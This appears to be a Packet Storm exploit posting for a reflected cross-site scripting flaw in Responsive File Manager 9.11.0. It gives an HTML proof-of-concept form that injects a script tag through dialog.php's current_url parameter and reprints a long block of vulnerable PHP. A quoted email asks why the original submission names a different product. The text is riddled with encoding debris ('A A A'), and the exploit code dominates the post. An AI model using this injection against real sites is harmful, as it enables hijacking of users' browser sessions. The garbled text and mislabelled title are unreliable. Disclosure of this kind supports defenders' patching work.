Responsive File Manager 9.11.0 Cross Site Scripting
Posted on 12 January 2017
*=============================================================| | Exploit Title: ResponsiveFilemanager Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.responsivefilemanager.com/ | | Download Link : https://github.com/trippo/ResponsiveFilemanager/archive/master.zip | | Version : v9.11.0 | | Tested on: Kali Linux | | Date: 1 /10 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD> |A A A <TITLE>ResponsiveFilemanage Cross Site Scripting</TITLE> |</HEAD> |<BODY> |<form action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php" method="get"> | <input type="hidden" id="current_url" value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/> |</form> |</BODY> |</HTML> *=======================| |How to fix this vulnerability : | |You should first try to f.ilter all input variables O After use command echo in script :) | *=======================| |Vulnerable code : | |<body> |A A A <input type="hidden" id="ftp" value="<?php echo !!$ftp; ?>" /> |A A A <input type="hidden" id="popup" value="<?php echo $popup;?>" /> |A A A <input type="hidden" id="callback" value="<?php echo $callback; ?>" />A A A |A A A <input type="hidden" id="crossdomain" value="<?php echo $crossdomain;?>" /> |A A A <input type="hidden" id="editor" value="<?php echo $editor;?>" /> |A A A <input type="hidden" id="view" value="<?php echo $view;?>" /> |A A A <input type="hidden" id="subdir" value="<?php echo $subdir;?>" /> |A A A <input type="hidden" id="field_id" value="<?php echo $field_id;?>" /> |A A A <input type="hidden" id="type_param" value="<?php echo $type_param;?>" /> |A A A <input type="hidden" id="upload_dir" value="<?php echo $upload_dir;?>" /> |A A A <input type="hidden" id="cur_dir" value="<?php echo $cur_dir;?>" /> |A A A <input type="hidden" id="cur_dir_thumb" value="<?php echo $thumbs_path.$subdir;?>" /> |A A A <input type="hidden" id="insert_folder_name" value="<?php echo trans('Insert_Folder_Name');?>" /> |A A A <input type="hidden" id="new_folder" value="<?php echo trans('New_Folder');?>" /> |A A A <input type="hidden" id="ok" value="<?php echo trans('OK');?>" /> |A A A <input type="hidden" id="cancel" value="<?php echo trans('Cancel');?>" /> |A A A <input type="hidden" id="rename" value="<?php echo trans('Rename');?>" /> |A A A <input type="hidden" id="lang_duplicate" value="<?php echo trans('Duplicate');?>" /> |A A A <input type="hidden" id="duplicate" value="<?php if($duplicate_files) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="base_url" value="<?php echo $base_url?>"/> |A A A <input type="hidden" id="ftp_base_url" value="<?php echo $ftp_base_url?>"/> |A A A <input type="hidden" id="fldr_value" value="<?php echo $subdir;?>"/> |A A A <input type="hidden" id="sub_folder" value="<?php echo $rfm_subfolder;?>"/> |A A A <input type="hidden" id="return_relative_url" value="<?php echo $return_relative_url == true ? 1 : 0;?>"/> |A A A <input type="hidden" id="lazy_loading_file_number_threshold" value="<?php echo $lazy_loading_file_number_threshold?>"/> |A A A <input type="hidden" id="file_number_limit_js" value="<?php echo $file_number_limit_js;?>" /> |A A A <input type="hidden" id="sort_by" value="<?php echo $sort_by;?>" /> |A A A <input type="hidden" id="descending" value="<?php echo $descending?1:0;?>" /> |A A A <input type="hidden" id="current_url" value="<?php echo str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>" /> |A A A <input type="hidden" id="lang_show_url" value="<?php echo trans('Show_url');?>" /> |A A A <input type="hidden" id="copy_cut_files_allowed" value="<?php if($copy_cut_files) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="copy_cut_dirs_allowed" value="<?php if($copy_cut_dirs) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="copy_cut_max_size" value="<?php echo $copy_cut_max_size;?>" /> |A A A <input type="hidden" id="copy_cut_max_count" value="<?php echo $copy_cut_max_count;?>" /> |A A A <input type="hidden" id="lang_copy" value="<?php echo trans('Copy');?>" /> |A A A <input type="hidden" id="lang_cut" value="<?php echo trans('Cut');?>" /> |A A A <input type="hidden" id="lang_paste" value="<?php echo trans('Paste');?>" /> |A A A <input type="hidden" id="lang_paste_here" value="<?php echo trans('Paste_Here');?>" /> |A A A <input type="hidden" id="lang_paste_confirm" value="<?php echo trans('Paste_Confirm');?>" /> |A A A <input type="hidden" id="lang_files" value="<?php echo trans('Files');?>" /> |A A A <input type="hidden" id="lang_folders" value="<?php echo trans('Folders');?>" /> |A A A <input type="hidden" id="lang_files_on_clipboard" value="<?php echo trans('Files_ON_Clipboard');?>" /> |A A A <input type="hidden" id="clipboard" value="<?php echo ((isset($_SESSION['RF']['clipboard']['path']) && trim($_SESSION['RF']['clipboard']['path']) != null) ? 1 : 0);?>" /> |A A A <input type="hidden" id="lang_clear_clipboard_confirm" value="<?php echo trans('Clear_Clipboard_Confirm');?>" /> |A A A <input type="hidden" id="lang_file_permission" value="<?php echo trans('File_Permission');?>" /> |A A A <input type="hidden" id="chmod_files_allowed" value="<?php if($chmod_files) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="chmod_dirs_allowed" value="<?php if($chmod_dirs) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="lang_lang_change" value="<?php echo trans('Lang_Change');?>" /> |A A A <input type="hidden" id="edit_text_files_allowed" value="<?php if($edit_text_files) echo 1; else echo 0;?>" /> |A A A <input type="hidden" id="lang_edit_file" value="<?php echo trans('Edit_File');?>" /> |A A A <input type="hidden" id="lang_new_file" value="<?php echo trans('New_File');?>" /> |A A A <input type="hidden" id="lang_filename" value="<?php echo trans('Filename');?>" /> |A A A <input type="hidden" id="lang_file_info" value="<?php echo fix_strtoupper(trans('File_info'));?>" /> |A A A <input type="hidden" id="lang_edit_image" value="<?php echo trans('Edit_image');?>" /> |A A A <input type="hidden" id="lang_error_upload" value="<?php echo trans('Error_Upload');?>" /> |A A A <input type="hidden" id="lang_select" value="<?php echo trans('Select');?>" /> |A A A <input type="hidden" id="lang_extract" value="<?php echo trans('Extract');?>" /> |A A A <input type="hidden" id="transliteration" value="<?php echo $transliteration?"true":"false";?>" /> |A A A <input type="hidden" id="convert_spaces" value="<?php echo $convert_spaces?"true":"false";?>" /> |A A A <input type="hidden" id="replace_with" value="<?php echo $convert_spaces? $replace_with : "";?>" /> |A A A <input type="hidden" id="lower_case" value="<?php echo $lower_case?"true":"false";?>" /> |A A A <input type="hidden" id="show_folder_size" value="<?php echo $show_folder_size;?>" /> |A A A <input type="hidden" id="add_time_to_img" value="<?php echo $add_time_to_img;?>" /> | *=============================================================| | Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O | xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O | And All Of My Friends O The Last One : My Self, M.R.S.L.YA *=============================================================| From: Packet Storm <packet@packetstormsecurity.com> To: aaNc Kha! aa <nc_521@yahoo.com> Sent: Wednesday, 11 January 2017, 6:40:19 Subject: Re: ResponsiveFilemanager Cross Site Scripting Why does one part say Benson Bank CMS and another ResponsiveFileManager? On Tue, Jan 10, 2017 at 02:52:42PM +0000, aaNc Kha! aa wrote: > *=============================================================| > |A ExploitA Title:A ResponsiveFilemanagerA CrossA SiteA Scripting > | > |A ExploitA Author:A AshiyaneA DigitalA SecurityA Team > | > |A VendorA Homepage:A http://www.responsivefilemanager.com/ > | > |A DownloadA LinkA :A https://github.com/trippo/ResponsiveFilemanager/archive/master.zip > | > |A VersionA :A v9.11.0 > | > |A TestedA on:A KaliA Linux > | > |A Date:A 1A /10A /A 2017 > *=============================================================| > |A ExploitA Code: > | > |<HTML> > |<HEAD> > |A A A A <TITLE>BensonA BankA CMSA vA 5.5A -A 2015.09.09A CrossA SiteA Scripting</TITLE> > |</HEAD> > |<BODY> > |<formA action="http://127.0.0.1/7/ResponsiveFilemanager-master/filemanager/dialog.php"A method="get"> > |A <inputA type="hidden"A id="current_url"A value="akey=key&crossdomain=0&editor=0&field_id=&fldr=/&lang=en_EN"><script>alert('M.R.S.L.Y')</script>&popup=0&relative_url=0&type=0"/> > |</form> > |</BODY> > |</HTML> > *=======================| > |HowA toA fixA thisA vulnerabilityA : > | > |YouA shouldA firstA tryA toA f.ilterA allA inputA variablesA OA AfterA useA commandA echoA inA scriptA :) > | > *=======================| > |VulnerableA codeA : > | > |<body> > |A A A A <inputA type="hidden"A id="ftp"A value="<?phpA echoA !!$ftp;A ?>"A /> > |A A A A <inputA type="hidden"A id="popup"A value="<?phpA echoA $popup;?>"A /> > |A A A A <inputA type="hidden"A id="callback"A value="<?phpA echoA $callback;A ?>"A />A A A A > |A A A A <inputA type="hidden"A id="crossdomain"A value="<?phpA echoA $crossdomain;?>"A /> > |A A A A <inputA type="hidden"A id="editor"A value="<?phpA echoA $editor;?>"A /> > |A A A A <inputA type="hidden"A id="view"A value="<?phpA echoA $view;?>"A /> > |A A A A <inputA type="hidden"A id="subdir"A value="<?phpA echoA $subdir;?>"A /> > |A A A A <inputA type="hidden"A id="field_id"A value="<?phpA echoA $field_id;?>"A /> > |A A A A <inputA type="hidden"A id="type_param"A value="<?phpA echoA $type_param;?>"A /> > |A A A A <inputA type="hidden"A id="upload_dir"A value="<?phpA echoA $upload_dir;?>"A /> > |A A A A <inputA type="hidden"A id="cur_dir"A value="<?phpA echoA $cur_dir;?>"A /> > |A A A A <inputA type="hidden"A id="cur_dir_thumb"A value="<?phpA echoA $thumbs_path.$subdir;?>"A /> > |A A A A <inputA type="hidden"A id="insert_folder_name"A value="<?phpA echoA trans('Insert_Folder_Name');?>"A /> > |A A A A <inputA type="hidden"A id="new_folder"A value="<?phpA echoA trans('New_Folder');?>"A /> > |A A A A <inputA type="hidden"A id="ok"A value="<?phpA echoA trans('OK');?>"A /> > |A A A A <inputA type="hidden"A id="cancel"A value="<?phpA echoA trans('Cancel');?>"A /> > |A A A A <inputA type="hidden"A id="rename"A value="<?phpA echoA trans('Rename');?>"A /> > |A A A A <inputA type="hidden"A id="lang_duplicate"A value="<?phpA echoA trans('Duplicate');?>"A /> > |A A A A <inputA type="hidden"A id="duplicate"A value="<?phpA if($duplicate_files)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="base_url"A value="<?phpA echoA $base_url?>"/> > |A A A A <inputA type="hidden"A id="ftp_base_url"A value="<?phpA echoA $ftp_base_url?>"/> > |A A A A <inputA type="hidden"A id="fldr_value"A value="<?phpA echoA $subdir;?>"/> > |A A A A <inputA type="hidden"A id="sub_folder"A value="<?phpA echoA $rfm_subfolder;?>"/> > |A A A A <inputA type="hidden"A id="return_relative_url"A value="<?phpA echoA $return_relative_urlA ==A trueA ?A 1A :A 0;?>"/> > |A A A A <inputA type="hidden"A id="lazy_loading_file_number_threshold"A value="<?phpA echoA $lazy_loading_file_number_threshold?>"/> > |A A A A <inputA type="hidden"A id="file_number_limit_js"A value="<?phpA echoA $file_number_limit_js;?>"A /> > |A A A A <inputA type="hidden"A id="sort_by"A value="<?phpA echoA $sort_by;?>"A /> > |A A A A <inputA type="hidden"A id="descending"A value="<?phpA echoA $descending?1:0;?>"A /> > |A A A A <inputA type="hidden"A id="current_url"A value="<?phpA echoA str_replace(array('&******='.$******,'&sort_by='.$sort_by,'&descending='.intval($descending)),array(''),$base_url.$_SERVER['REQUEST_URI']);?>"A /> > |A A A A <inputA type="hidden"A id="lang_show_url"A value="<?phpA echoA trans('Show_url');?>"A /> > |A A A A <inputA type="hidden"A id="copy_cut_files_allowed"A value="<?phpA if($copy_cut_files)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="copy_cut_dirs_allowed"A value="<?phpA if($copy_cut_dirs)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="copy_cut_max_size"A value="<?phpA echoA $copy_cut_max_size;?>"A /> > |A A A A <inputA type="hidden"A id="copy_cut_max_count"A value="<?phpA echoA $copy_cut_max_count;?>"A /> > |A A A A <inputA type="hidden"A id="lang_copy"A value="<?phpA echoA trans('Copy');?>"A /> > |A A A A <inputA type="hidden"A id="lang_cut"A value="<?phpA echoA trans('Cut');?>"A /> > |A A A A <inputA type="hidden"A id="lang_paste"A value="<?phpA echoA trans('Paste');?>"A /> > |A A A A <inputA type="hidden"A id="lang_paste_here"A value="<?phpA echoA trans('Paste_Here');?>"A /> > |A A A A <inputA type="hidden"A id="lang_paste_confirm"A value="<?phpA echoA trans('Paste_Confirm');?>"A /> > |A A A A <inputA type="hidden"A id="lang_files"A value="<?phpA echoA trans('Files');?>"A /> > |A A A A <inputA type="hidden"A id="lang_folders"A value="<?phpA echoA trans('Folders');?>"A /> > |A A A A <inputA type="hidden"A id="lang_files_on_clipboard"A value="<?phpA echoA trans('Files_ON_Clipboard');?>"A /> > |A A A A <inputA type="hidden"A id="clipboard"A value="<?phpA echoA ((isset($_SESSION['RF']['clipboard']['path'])A &&A trim($_SESSION['RF']['clipboard']['path'])A !=A null)A ?A 1A :A 0);?>"A /> > |A A A A <inputA type="hidden"A id="lang_clear_clipboard_confirm"A value="<?phpA echoA trans('Clear_Clipboard_Confirm');?>"A /> > |A A A A <inputA type="hidden"A id="lang_file_permission"A value="<?phpA echoA trans('File_Permission');?>"A /> > |A A A A <inputA type="hidden"A id="chmod_files_allowed"A value="<?phpA if($chmod_files)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="chmod_dirs_allowed"A value="<?phpA if($chmod_dirs)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="lang_lang_change"A value="<?phpA echoA trans('Lang_Change');?>"A /> > |A A A A <inputA type="hidden"A id="edit_text_files_allowed"A value="<?phpA if($edit_text_files)A echoA 1;A elseA echoA 0;?>"A /> > |A A A A <inputA type="hidden"A id="lang_edit_file"A value="<?phpA echoA trans('Edit_File');?>"A /> > |A A A A <inputA type="hidden"A id="lang_new_file"A value="<?phpA echoA trans('New_File');?>"A /> > |A A A A <inputA type="hidden"A id="lang_filename"A value="<?phpA echoA trans('Filename');?>"A /> > |A A A A <inputA type="hidden"A id="lang_file_info"A value="<?phpA echoA fix_strtoupper(trans('File_info'));?>"A /> > |A A A A <inputA type="hidden"A id="lang_edit_image"A value="<?phpA echoA trans('Edit_image');?>"A /> > |A A A A <inputA type="hidden"A id="lang_error_upload"A value="<?phpA echoA trans('Error_Upload');?>"A /> > |A A A A <inputA type="hidden"A id="lang_select"A value="<?phpA echoA trans('Select');?>"A /> > |A A A A <inputA type="hidden"A id="lang_extract"A value="<?phpA echoA trans('Extract');?>"A /> > |A A A A <inputA type="hidden"A id="transliteration"A value="<?phpA echoA $transliteration?"true":"false";?>"A /> > |A A A A <inputA type="hidden"A id="convert_spaces"A value="<?phpA echoA $convert_spaces?"true":"false";?>"A /> > |A A A A <inputA type="hidden"A id="replace_with"A value="<?phpA echoA $convert_spaces?A $replace_withA :A "";?>"A /> > |A A A A <inputA type="hidden"A id="lower_case"A value="<?phpA echoA $lower_case?"true":"false";?>"A /> > |A A A A <inputA type="hidden"A id="show_folder_size"A value="<?phpA echoA $show_folder_size;?>"A /> > |A A A A <inputA type="hidden"A id="add_time_to_img"A value="<?phpA echoA $add_time_to_img;?>"A /> > | > *=============================================================| > |A SpecialA ThanksA ToA :A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O > |A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O > |A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A > *=============================================================|